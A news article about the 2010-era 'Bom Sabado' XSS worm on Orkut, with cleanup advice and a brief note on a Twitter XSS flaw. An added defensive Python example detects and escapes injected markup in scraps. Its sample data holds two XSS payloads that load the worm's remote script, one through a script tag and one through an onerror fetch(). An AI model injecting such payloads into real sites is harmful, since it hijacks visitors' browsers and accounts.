Orkut Attacked By ‘Bom Sabado’ Worm

In the second major XSS (cross-site scripting) attack on a social networking service this week, after Twitter, Orkut, the social networking site owned by Google, was flooded with “Bom Sabado” scraps. “Bom Sabado” means “Good Saturday” in Portuguese, the official language of Brazil.

According to the discussion on the official Orkut help forum, the worm posts scraps containing the text “Bom Sabado” and adds affected users to new Orkut groups. Similar XSS attacks have targeted Orkut users in the past. Experts have advised users to avoid logging on to Orkut until Orkut engineers fix the security hole, and not to click on any suspicious links. Orkut had announced new updates to the website just last month.

If you are an Orkut user and have received a “Bom Sabado” scrap from one or more of your friends, then you are under attack and you should clear your browser cookies, history and cache. You should also change your password and password recovery questions by visiting https://www.google.com/accounts/ManageAccount?hl=en. Switch back to old Orkut and then delete the “Bom Sabado” scrap. Avoid visiting the profiles of friends who are infected or who have sent you the scraps. If you are a Firefox user, use the NoScript add-on. More information can be found here.

At the time of writing, we have seen that the malicious scrap was downloading a JavaScript file from tptools.org/worm.js. On investigating, we found that the site has since been suspended by its host.
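The scrap-borne injection described above is a stored XSS: user-submitted scrap markup was rendered as live HTML, so a `<script src=...>` pointing at the external worm.js file ran in every viewer's browser. The following added example (not Orkut's code, nor from the article) shows the two defender-side checks that stop it: scanning scrap bodies for active content, and output-encoding them before display. The scrap records are constructed samples; the `worm.js` URL is the one the article names, and the function names are hypothetical.

```python
import html
from html.parser import HTMLParser

# Constructed sample scraps (not real captures): one benign greeting, one
# carrying a remote-script tag like the article describes, one using an
# inline event handler instead of a script tag.
SAMPLE_SCRAPS = [
    {"id": 1, "sender": "alice", "body": "Bom Sabado! Vamos para a praia?"},
    {"id": 2, "sender": "bob",
     "body": 'Bom Sabado <script src="http://tptools.org/worm.js"></script>'},
    {"id": 3, "sender": "carol",
     "body": '<img src="x" onerror="fetch(\'http://tptools.org/worm.js\')">'},
]


class _ScrapScanner(HTMLParser):
    """Collects script tags (with their src) and inline on* event handlers."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self.findings.append(("script_tag", attrs.get("src", "inline")))
        for name, value in attrs.items():
            if name.startswith("on"):  # onerror=, onload=, onclick=, ...
                self.findings.append(("event_handler", f"{name}={value}"))


def scan_scrap(body: str):
    """Return a list of (kind, detail) findings for one scrap body."""
    scanner = _ScrapScanner()
    scanner.feed(body)
    return scanner.findings


def flag_scraps(scraps):
    """IDs of scraps whose body contains active content (candidate XSS)."""
    return [s["id"] for s in scraps if scan_scrap(s["body"])]


def render_scrap(body: str) -> str:
    """Output-encode a scrap so any markup is shown as text, never executed."""
    return html.escape(body, quote=True)
```

Scanning the escaped output of `render_scrap` yields no findings, which is the property the page template must guarantee for every scrap it displays.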

Earlier this week, the popular microblogging website Twitter was also at the receiving end of an XSS exploit. The attack, which emerged and was shut down within hours on Tuesday morning, involved an XSS flaw that allowed users to run JavaScript programs on other users' computers.
